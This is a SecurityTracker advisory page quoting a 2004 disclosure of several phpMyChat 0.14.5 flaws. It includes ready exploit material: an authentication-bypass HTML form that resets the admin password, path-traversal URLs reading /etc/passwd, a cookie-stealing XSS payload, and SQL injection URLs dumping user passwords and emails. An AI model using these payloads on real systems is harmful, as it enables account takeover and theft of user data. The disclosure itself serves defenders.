SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   phpMyChat Vendors:   phpHeaven
phpMyChat Grants Administrative Access to Remote Users and Has Other Flaws
SecurityTracker Alert ID:  1010515
SecurityTracker URL:  http://securitytracker.com/id/1010515
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 17 2004
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.14.5
Description:   Several vulnerabilities were reported in phpMyChat. A remote user can gain administrative access to the application. A remote user can also inject SQL commands and conduct cross-site scripting attacks. A remote authenticated administrator can view files on the target system.

HEX reported that 'lib/login.lib.php3' and 'admin/adminBody.php3' contain several flaws.

It is reported that a remote user can send a specially crafted HTML form value (do_not_login="false") to the 'chat/edituser.php3' to gain administrative access to the system.

It is also reported that a remote authenticated administrator (or a remote user that has exploited the above listed flaw) can view files and directories on the target system. The remote authenticated administrator can supply a specially crafted filename for the 'sheet' variable in 'admin.php3'. Some demonstration exploit URLs are provided:
http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/
http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&s

It is also reported that the 'input.php3' script does not properly validate user-supplied input in the 'C' variable. A remote user can create specially crafted input that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the phpMyChat software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

It is also reported that a remote user can also inject SQL commands via the 'usersL.php3' script because many variables are not properly validated, including $sortBy, $sortOrder, $startReg, $U, $LastCheck, and others. Some demonstration exploit URLs are provided:

http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*

Impact:   A remote user can gain administrative access to the application.

A remote user can inject SQL commands.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpMyChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote authenticated administrator can view arbitrary files on the target system.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phpheaven.net/projects/phpmychat/rubrique4.html (Links to External Site)
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpMyChat 0.14.5


Informations :
Language : PHP
Bugged Version : phpMyChat ver. 0.14.5 (and less ?)
Patched version : none
Website : http://www.phpheaven.net/
Problems : Permanent XSS, authorization bypass, SQL-injection, include (read) files.

Objects :
- lib/login.lib.php3
- admin/adminBody.php3
and more ...

Exploits :
1) For non-authorized login it needs to send only one additional variable: do_not_login="false"

   Example:
   <HTML>

   <HEAD>
   <TITLE>phpMyChat exploit</TITLE>
   </HEAD>

   <BODY>
   <FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
   <INPUT type="hidden" name="FORM_SEND" value="1">
   <INPUT type="hidden" name="AUTH_USERNAME" value="admin">
   <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
   <!-- INSERT -->
   <INPUT type="hidden" name="do_not_login" value="false">
   <!-- END INSERT -->
   <INPUT TYPE="hidden" NAME="L" VALUE="russian">
   <INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
   <INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
   <INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
   <INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
   <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
   <INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
   <INPUT TYPE="text" NAME="EMAIL" VALUE="you@email.ru">
   <INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
   <INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
   </FORM>
   </BODY>

   </HTML>
   
2) To read files one needs to have the rights of administrator (read above for how to get them)!
   
   Variables "sheet" ? "what" are not filtered:
   require("./admin/admin${sheet}.php3");
   and
   if (isset($What) && $What != "") include("./admin/admin".$What.".php3");
   
   Example:
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=[FILE]%00
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=/../../../../../../etc/passwd%00
   and
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOU HASH PASSWORD]&sheet=1
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOU HASH PASSWORD]&sheet=1

3) Cross-Site Scripting aka XSS
   In input.php3 form there's variable "C", in which the color of messages is transferred.
   
   Example:
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]">
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">
   
4) Great number of variables aren't filtered:
   $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...
   Example SQL-injection:
   http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*

Patch/More Details :
Waiting for the patch at http://www.phpheaven.net/


[ Copyright by [HEX] | mailto:hex(a)hex.net.ru ]

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC